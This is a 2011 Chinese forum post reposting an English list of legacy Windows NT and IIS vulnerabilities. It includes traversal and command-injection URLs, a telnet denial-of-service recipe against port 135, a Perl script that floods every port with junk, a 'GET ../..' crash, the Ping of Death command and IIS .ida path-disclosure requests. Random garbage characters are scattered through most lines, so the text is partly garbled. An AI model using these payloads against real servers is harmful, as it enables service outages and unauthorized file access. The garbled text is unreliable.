找回密码
 注册

QQ登录

只需一步,快速开始

NT的漏洞及描述(英文)

[复制链接]
发表于 2011-1-13 17:12:25 | 显示全部楼层 |阅读模式
受影响系统:4.0,iis 1.03 v& _3 o7 G  ~" I& d8 l+ i
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
. f* n6 W9 }$ ^
/ [. s6 ?$ R  xA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
, Q: X2 n' E! _$ Z! j$ |& `/ G; y& t8 k' p* `/ W; [
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
: M/ d8 v8 P7 L) l
7 j9 Q9 P% D9 o" I--------------------------------------------------------------------* ]" D  x/ h  }1 I7 X$ ~
4 S. f% ?7 B' {; @! N+ _
受影响系统:4.06 J7 u" [4 g1 u* m
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.3 @+ G1 h- e$ D: ^3 i

4 b! D* `3 [% \+ N. \% F' [! mIf the file 'target.bat' exists, the file will be truncated.
9 A/ x+ B& W/ R% h- E4 C
+ J; n7 B1 w# ^, Y( F+ [( o, L! Y% l# n" W: r, I
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.( C, c4 |# n$ s: A  f% o" z, K
+ R3 }2 n6 V: l( P0 i
----------------------------------------------------------------------* X5 B* T0 O/ L4 _0 k( c. C) L* D+ o4 `

' n" W' ^' }/ i' T% [" H4 L受影响系统:3.51,4.0/ k0 S. V1 V6 M* Y, r. d/ b
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
* x2 [; k0 X1 k
# Z' T0 s7 j' q1 y5 LThe following steps;
. h; C& D8 U  y" E
& V  J, K+ x, {8 iTelnet to an NT 4.0 system on port 135 * w4 Z% g% b2 g! T5 a
Type about 10 characters followed by a <CR>
; |4 q& |9 q4 b/ Y+ xExit Telnet 0 ?1 e! Z0 q* K+ Q/ h7 P
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
9 A2 z7 e8 p: Y+ F2 D- p, T% W7 m1 w$ h
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.2 I. D: x  S. S  `# Z

: C. b# D' p  r) T1 V1 KThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.8 y' T- k6 y* w  B0 V7 z
+ D0 I  R$ [7 n- M2 p
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
4 C/ M/ E# y' N. H6 U4 X. {2 j# c2 a8 [/ U. l! S7 c
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):5 c9 f. K* c  i4 V5 q( P
9 j0 m5 Z/ f: C! H* d
/*begin poke code*/
3 a$ ^% j$ ]( S5 |) z$ E- D" F# o2 ]7 e' a$ t7 v/ P& D5 c4 ~
use Socket;
) ]# ?7 L7 f! A3 T  Tuse FileHandle;/ N1 U4 T& D' Y/ h
require "chat2.pl";' y' t* o, y7 E

; R. C) Z- U4 ^# Z! U& V$systemname = $ARGV[0] && shift;9 f$ k4 m; G, k0 y1 a0 |( q, ^! C. _0 r
9 ~$ e' c9 ]) x; \# m1 F% S
$verbose = 1; # tell me what you're hitting* n5 @5 ?! |3 j: h, X1 Q
$knownports = 1; # don't hit known problem ports" o: l. I* {3 C' Y
for ($port = $0; $port<65535; $port++) ' ?8 ^3 f6 c3 k, u$ ?1 w+ r- s
{
! S! Y& ^" [0 [: m/ M3 n: x' _- f: C2 F' m/ ^
$ `: |. n7 ~( s$ b! d9 x* H
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {% L: D. L$ q4 e: c7 a0 D( O
next;, y( l; m& H1 @4 E9 f
}  E8 v% F1 t$ j% X5 D( t$ \9 }$ w
$fh = chat::open_port($systemname, $port);
7 O( a/ n2 e' \5 F  Pchat::print ($fh,"This is about ten characters or more");: B* F' t- U2 ^
if ($verbose) {& s3 p. O  G# j
print "Trying port: $port\n";
9 i8 W5 E6 J4 E8 _}
  I8 g; {. F# I" h* t% j: Qchat::close($fh);
, K( R# J2 j- {
$ s( q7 D/ h. \: i: B}! x2 L- s. K& q

; L% l. s. [, {' m# k, _% W' G' C9 g) ]! z# A* Z
/*end poke code*// e9 t5 n4 k: A1 q% h

! X$ N0 V! J% w0 V* [0 W9 dSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
, Z* B8 t$ L2 A8 _9 c; m. B+ u4 ?/ ~8 c
--------------------------------------------------------------------------------  x0 N2 ?+ Y8 o5 g, w3 o

9 k3 y& L) Q/ Z1 ]6 m受影响系统:4.0
4 b2 g' y  f& i4 e0 K* R& CUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
/ y) _1 V; [; D+ O0 U) q3 X2 T: r0 h( F2 i+ ]% N
This attack causes Dr. Watson to display an alert window and to log an error: 0 w& ]4 y4 p* M4 a% j

2 A1 N3 m3 p2 |% E3 m' _5 ["The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"! E, K3 a3 W7 ^! t7 R9 d
; V9 G  R2 ]' f: _" p  |0 f
--------------------------------------------------------------------------------
: G5 Q2 D6 H: y, U- z" q- G9 A
  w( p0 I1 B0 Z" p% @, m受影响系统:3.51,4.0; H4 Q. o- Z$ v4 m
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:4 w% V+ i* y+ X* G' Y
- E) }) c8 g$ c. t. [" I
STOP: 0X0000001E
; k+ G3 J# N/ W# Q& GKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
! O) e# k* D7 j/ J2 b7 l) Z8 j9 q0 X9 n" o1 g* A
-OR-
$ s0 \. g! f# K' Z; q* H7 P! F
- j. S8 {) I2 t' ]# `' `0 CSTOP: 0x0000000A
* q" B. |4 T! wIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
1 M3 o, P( t7 T' \1 }
" M2 f- d% k5 z4 |6 GNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
0 |  r# V; P# K% w" h
8 Z( `+ x( S3 ?. d) E--------------------------------------------------------------------------------6 t2 @  {5 Q+ U7 I5 z2 `$ K

) H  S7 k" t) F! k( o1 f2 b/ \Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
! d5 u4 r; j3 ]
& ]8 B1 B7 v$ m( }) @' \2 U, v1 S--------------------------------------------------------
5 J3 h4 o: X; \7 Z# ~4 j$ x4 G$ ?' G1 U
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2025-4-13 06:06

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表